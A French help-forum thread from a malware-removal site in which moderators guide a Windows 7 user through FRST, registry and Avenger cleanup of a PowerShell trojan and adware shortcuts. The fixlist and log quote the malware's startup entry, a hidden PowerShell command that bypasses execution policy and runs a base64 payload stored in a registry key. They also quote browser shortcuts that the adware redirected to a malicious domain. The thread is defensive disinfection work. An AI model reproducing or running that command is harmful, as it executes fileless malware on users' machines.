erreur $RECYCLEBIN\Vlc.rar / adobe.rar au démarrage

Aide à la désinfection pour supprimer les virus, adwares, ransomwares, trojans.

Modérateurs : Mods Windows, Helper

Répondre
badido93
newbie
newbie
Messages : 6
Inscription : 24 févr. 2017 19:14

erreur $RECYCLEBIN\Vlc.rar / adobe.rar au démarrage

Message par badido93 » 24 févr. 2017 19:44

Bonjour,
J'ai vu qu'exactement le même sujet a été traité , mais la solution ne fonctionne pas pour moi ( c'est peut-etre normal, le fichier de script (fixlist.txt) pour corriger le probleme n'etait surement pas le meme, vu que j'ai un pc different).
J'ai deux messages d'erreurs qui apparaisse juste après le démarrage de Windows 7

- Impossible de trouver le fichier script "D:\$RECYCLEBIN\Vlc.rar"
- Impossible de trouver le fichier script"D:\$RECYCLEBIN\Adobe.rar"


j'ai déjà commencer la procédure de résolution avec Farbar Recovery Scan Tool et j'ai les trois rapports de scan FRST, Addition, Shortcut. comme indiquer sur le Tutorial Farbar et voilà les les liens générés par le site pjjoint.malekal.com :
FRST : http://pjjoint.malekal.com/files.php?id ... q7n13x7y13
Addition : http://pjjoint.malekal.com/files.php?id ... 3q11k12r10
Shortcut : http://pjjoint.malekal.com/files.php?id ... 7b6q115g14

Merci pour votre précieuse aide.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 84560
Inscription : 10 sept. 2005 13:57
Contact :

Re: erreur $RECYCLEBIN\Vlc.rar / adobe.rar au démarrage

Message par Malekal_morte » 24 févr. 2017 19:59

Salut,

Tu as aussi un Trojan Powershell..
Tu as aussi AVG + Kaspersky (que tu sembles avoir cracké...).
Donc deux antivirus c'est mal. (ralentissement de Windows, plantages etc)

Désinstalle SuperAntispyware aussi...

Je te conseille de désinstaller McAfee Security Scan car c'est avant tout un programme markéting proposé à l'installation d'autres logiciels ( comme Adobe Flash) pour final tenter de te vendre l'antivirus.


Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :

Code : Tout sélectionner

CreateRestorePoint:
CloseProcesses:
2017-01-31 00:46 - 2017-02-03 23:56 - 00000000 ____D C:\Users\SAMSUNG\Documents\Mobogenie
2017-01-31 00:46 - 2017-02-03 23:56 - 00000000 ____D C:\Users\SAMSUNG\Documents\backup Mobogenie 2017
2017-01-31 00:41 - 2017-01-31 00:44 - 36250840 _____ C:\Users\SAMSUNG\Desktop\Mobogenie_Setup_3.3.7_10002.exe
 ShortcutWithArgument: C:\Users\SAMSUNG\Desktop\Google Chrome.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://sweets-pages.com/or/5
ShortcutWithArgument: C:\Users\SAMSUNG\Desktop\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://sweets-pages.com/or/1
ShortcutWithArgument: C:\Users\SAMSUNG\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\chrome.LNK -> C:\Program Files\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://sweets-pages.com/or/5
ShortcutWithArgument: C:\Users\SAMSUNG\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Internet Explorer.LNK -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://sweets-pages.com/or/1
 HKU\S-1-5-21-1276328481-1512681731-2006989473-1000\...\Run: [{A6C52B7D-FDDF-4E12-9E3A-83EC06C51F2C}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\BZgsUipiqcUWgL').czfVFCwND))); 
 reg: reg delete "HKCU\Software\Classes\BZgsUipiqcUWgL
 2017-02-03 23:56 - 2014-11-29 15:55 - 00000000 ____D C:\Program Files\Mobogenie3
 Startup: C:\Users\SAMSUNG\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C-cleaner.lnk [2016-05-18]
S4 Watsvc; C:\Program Files\Blazers\Watsvc.exe [107160 2015-04-16] (TODO: <公司名>) [Fichier non signé]
C:\Program Files\Blazers
 Startup: C:\Users\SAMSUNG\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VideoLAN.lnk [2016-05-18]"
 Hosts:
EmptyTemp:
RemoveProxy:
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparait, copie/colle le contenu ici dans un nouveau message.


Redémarre l'ordinateur.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

badido93
newbie
newbie
Messages : 6
Inscription : 24 févr. 2017 19:14

Re: erreur $RECYCLEBIN\Vlc.rar / adobe.rar au démarrage

Message par badido93 » 24 févr. 2017 20:25

je te remercie encore une fois pour avoir pris la peine de répondre
je vais tout de suite copier et coller la solution
En ce qui concerne les anti virus que tu viens de citer, j'ai installé Kaspersky hier comme antivirus par le biais de torrent, effectivement en version cracké , AVG je l'ai desinstallé ca fait un moment , il ne figure plus dans la liste des programmes à desinstaller mais apparemment il est toujours présent sur mon ordi, et enfin pour Superspyware, je l'ai telechargé tout a l heure sous le conseil d'un ami, j'ai eu un petit souci, il m'a preté sa clé usb, et hop par magie il avait perdu toute ses données, et a trouvé de nombreux fichiers de 1 ko (j'ai oublié le format), bref j'etais désespéré alors j'ai voulu faire un peu le ménage.

badido93
newbie
newbie
Messages : 6
Inscription : 24 févr. 2017 19:14

Re: erreur $RECYCLEBIN\Vlc.rar / adobe.rar au démarrage

Message par badido93 » 24 févr. 2017 20:26

Que me conseille tu comme protection ?

Avatar de l’utilisateur
angelique
Geek à longue barbe
Geek à longue barbe
Messages : 27028
Inscription : 28 févr. 2008 14:58
Localisation : Breizhilienne à l' 0u3st
Contact :

Re: erreur $RECYCLEBIN\Vlc.rar / adobe.rar au démarrage

Message par angelique » 24 févr. 2017 21:54

Fait déjà les manipulations que te recommande Malekal !
Avec Gnu_Linux t'as un Noyau ... avec Ѡindows t'as que les pépins
http://angelik.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Ne soyez pas Rat!
Image
---------------------------------------------------------------------------------------------------------------------
ZIK.:: R00tsL3gacy Reggae141.com
ZIK.:: LaGr0sseRadi0

badido93
newbie
newbie
Messages : 6
Inscription : 24 févr. 2017 19:14

Re: erreur $RECYCLEBIN\Vlc.rar / adobe.rar au démarrage

Message par badido93 » 24 févr. 2017 23:22

J'ai essayé deux fois la manipulation, en redémarrant mon pc
Sur la forme elle plante, c'est a dire que FRST m'affiche comme quoi, il est toujours entrain de "corriger " , je l'ai laissé 2 heures, toujours correction en cours
Sur le fond il fonctionne vu que j'ai obtenu un fichier " Fixlog.txt " , voici ce qu'il contient :


Résultats de correction de Farbar Recovery Scan Tool (x86) Version: 23-02-2017 01
Exécuté par SAMSUNG (24-02-2017 21:34:00) Run:3
Exécuté depuis C:\Users\SAMSUNG\Desktop
Profils chargés: SAMSUNG (Profils disponibles: SAMSUNG)
Mode d'amorçage: Normal

==============================================

fixlist contenu:
*****************
CreateRestorePoint:
CloseProcesses:
2017-01-31 00:46 - 2017-02-03 23:56 - 00000000 ____D C:\Users\SAMSUNG\Documents\Mobogenie
2017-01-31 00:46 - 2017-02-03 23:56 - 00000000 ____D C:\Users\SAMSUNG\Documents\backup Mobogenie 2017
2017-01-31 00:41 - 2017-01-31 00:44 - 36250840 _____ C:\Users\SAMSUNG\Desktop\Mobogenie_Setup_3.3.7_10002.exe
ShortcutWithArgument: C:\Users\SAMSUNG\Desktop\Google Chrome.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://sweets-pages.com/or/5
ShortcutWithArgument: C:\Users\SAMSUNG\Desktop\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://sweets-pages.com/or/1
ShortcutWithArgument: C:\Users\SAMSUNG\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\chrome.LNK -> C:\Program Files\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://sweets-pages.com/or/5
ShortcutWithArgument: C:\Users\SAMSUNG\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Internet Explorer.LNK -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://sweets-pages.com/or/1
HKU\S-1-5-21-1276328481-1512681731-2006989473-1000\...\Run: [{A6C52B7D-FDDF-4E12-9E3A-83EC06C51F2C}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\BZgsUipiqcUWgL').czfVFCwND)));
reg: reg delete "HKCU\Software\Classes\BZgsUipiqcUWgL
2017-02-03 23:56 - 2014-11-29 15:55 - 00000000 ____D C:\Program Files\Mobogenie3
Startup: C:\Users\SAMSUNG\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C-cleaner.lnk [2016-05-18]
S4 Watsvc; C:\Program Files\Blazers\Watsvc.exe [107160 2015-04-16] (TODO: <???>) [Fichier non signé]
C:\Program Files\Blazers
Startup: C:\Users\SAMSUNG\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VideoLAN.lnk [2016-05-18]"
Hosts:
EmptyTemp:
RemoveProxy:
*****************

Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
"C:\Users\SAMSUNG\Documents\Mobogenie" => non trouvé(e).
"C:\Users\SAMSUNG\Documents\backup Mobogenie 2017" => non trouvé(e).
"C:\Users\SAMSUNG\Desktop\Mobogenie_Setup_3.3.7_10002.exe" => non trouvé(e).
C:\Users\SAMSUNG\Desktop\Google Chrome.lnk => Raccourci argument supprimé(es) avec succès.
C:\Users\SAMSUNG\Desktop\Internet Explorer.lnk => Raccourci argument supprimé(es) avec succès.
C:\Users\SAMSUNG\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\chrome.LNK => Raccourci argument supprimé(es) avec succès.
C:\Users\SAMSUNG\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Internet Explorer.LNK => Raccourci argument supprimé(es) avec succès.
HKU\S-1-5-21-1276328481-1512681731-2006989473-1000\Software\Microsoft\Windows\CurrentVersion\Run\\{A6C52B7D-FDDF-4E12-9E3A-83EC06C51F2C} => valeur non trouvé(e).

========= reg delete "HKCU\Software\Classes\BZgsUipiqcUWgL =========

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 84560
Inscription : 10 sept. 2005 13:57
Contact :

Re: erreur $RECYCLEBIN\Vlc.rar / adobe.rar au démarrage

Message par Malekal_morte » 25 févr. 2017 10:17

c'est la suppression de la clé : BZgsUipiqcUWgL
qui pose problème.

Touche Windows + R
tape regedit et OK.
Déroule : HKEY_CURRENT_USER\Software\Classes et supprime BZgsUipiqcUWgL
Attends 30s et rafraichis la page (F5)
et vois si BZgsUipiqcUWgL revient.

Refais un scan FRST et donne les rapports via pjjoint.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

badido93
newbie
newbie
Messages : 6
Inscription : 24 févr. 2017 19:14

Re: erreur $RECYCLEBIN\Vlc.rar / adobe.rar au démarrage

Message par badido93 » 25 févr. 2017 18:26

Alors j'ai suivi ta manip, Ce me met ''' Suppression de BZgsUipiqcUWgL impossible : erreur lors de la suppression de la clef. """
Le dossier ne se supprime pas, en revanche les fichiers qu'il contient disparaissent puis réapparaissent au bout d'un certain temps,
Dois-je refaire un scan FRST ?

Avatar de l’utilisateur
angelique
Geek à longue barbe
Geek à longue barbe
Messages : 27028
Inscription : 28 févr. 2008 14:58
Localisation : Breizhilienne à l' 0u3st
Contact :

Re: erreur $RECYCLEBIN\Vlc.rar / adobe.rar au démarrage

Message par angelique » 25 févr. 2017 18:52

Vu que ton système est 32 bits , essaie The Avenger de Swandog46:




Comme google dit que la page http://www.geekstogo.com/forum/files/fi ... swandog46/ est malveillante alors que ce n'est pas le cas

Image

➯ Télécharge sur ton Bureau :: http://angelik.altervista.org/angelique/avenger.zip et de zippe le.

➯ Lance l'épée , exécuter en tant qu'administrateur sous ton Ѡindows



Dans le cadre , sous Input Script here , copie_colle le contenu du cadre ci dessous et clic execute:
begin copying here:
Registry keys to delete:
HKEY_CURRENT_USER\Software\Classes\BZgsUipiqcUWgL
Files to delete:
C:\Users\SAMSUNG\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C-cleaner.lnk
C:\Users\SAMSUNG\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VideoLAN.lnk
C:\Users\SAMSUNG\Desktop\Mobogenie_Setup_3.3.7_10002.exe
Folders to delete:
C:\Program Files\Blazers
C:\Users\SAMSUNG\Documents\Mobogenie
C:\Users\SAMSUNG\Documents\backup Mobogenie 2017
Drivers to delete:
Watsvc
» Après le ré-démarrage, il crée un fichier log qui s'ouvrira,que tu posteras dans ta prochaine réponse, faisant apparaître les actions exécutées par The Avenger. Ce fichier log se trouve ici : C:\avenger.txt
Avec Gnu_Linux t'as un Noyau ... avec Ѡindows t'as que les pépins
http://angelik.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Ne soyez pas Rat!
Image
---------------------------------------------------------------------------------------------------------------------
ZIK.:: R00tsL3gacy Reggae141.com
ZIK.:: LaGr0sseRadi0

Avatar de l’utilisateur
angelique
Geek à longue barbe
Geek à longue barbe
Messages : 27028
Inscription : 28 févr. 2008 14:58
Localisation : Breizhilienne à l' 0u3st
Contact :

Re: erreur $RECYCLEBIN\Vlc.rar / adobe.rar au démarrage

Message par angelique » 25 févr. 2017 19:03

j'ai édité mon message précédent, prends en connaissance.
Avec Gnu_Linux t'as un Noyau ... avec Ѡindows t'as que les pépins
http://angelik.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Ne soyez pas Rat!
Image
---------------------------------------------------------------------------------------------------------------------
ZIK.:: R00tsL3gacy Reggae141.com
ZIK.:: LaGr0sseRadi0

badido93
newbie
newbie
Messages : 6
Inscription : 24 févr. 2017 19:14

Re: erreur $RECYCLEBIN\Vlc.rar / adobe.rar au démarrage

Message par badido93 » 26 févr. 2017 01:48

Oui j'ai tres bien suivi tout ce dont tu m'as expliqué je vais t'etonner mais ça ne veut pas se supprimer , un message d'erreur m'indiquant cela au moment d'executer le script dans The avenger.
C'est rare que je dis ça, mais j'abondonne, je vais changer ce pc, il est trop ''vieux''
En tout cas je te remercie vraiment d'avoir pris la peine de me repondre, tres sympa de ta part, et je suis désolé de t'avoir saoulé avec ca.
Bonne continuation :)

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 84560
Inscription : 10 sept. 2005 13:57
Contact :

Re: erreur $RECYCLEBIN\Vlc.rar / adobe.rar au démarrage

Message par Malekal_morte » 26 févr. 2017 11:11

Fais ceci :


Pour te protéger des infections amovibles type Wscript (Windows Script Host) Clic sur Désactiver au niveau de Windows Script Host.
Marmiton va bloquer les scripts malicieux (VBS, VBE, JavaScript etc) notamment qui sont utilisés pour propager des ransomwares comme Locky.


puis ouvre l'explorateur de fichiers.
Dans la barre d'adresse, tape shell:startup et OK.
startup_dossier.png
Dossier startup
startup_dossier.png (3.44 Kio) Consulté 230 fois
et OK.
Supprime tous les raccourcis.
Redémarre l'ordinateur.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
angelique
Geek à longue barbe
Geek à longue barbe
Messages : 27028
Inscription : 28 févr. 2008 14:58
Localisation : Breizhilienne à l' 0u3st
Contact :

Re: erreur $RECYCLEBIN\Vlc.rar / adobe.rar au démarrage

Message par angelique » 26 févr. 2017 12:18

je vais t'etonner mais ça ne veut pas se supprimer , un message d'erreur m'indiquant cela au moment d'executer le script dans The avenger.
Tu n'as pas plus de précision sur le message d'erreur ?
Avec Gnu_Linux t'as un Noyau ... avec Ѡindows t'as que les pépins
http://angelik.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Ne soyez pas Rat!
Image
---------------------------------------------------------------------------------------------------------------------
ZIK.:: R00tsL3gacy Reggae141.com
ZIK.:: LaGr0sseRadi0

Répondre

Revenir vers « VIRUS : Supprimer/Desinfecter (Trojan, Adwares, Ransomwares, Backdoor, Spywares) »

Qui est en ligne ?

Utilisateurs parcourant ce forum : yoloman et 2 invités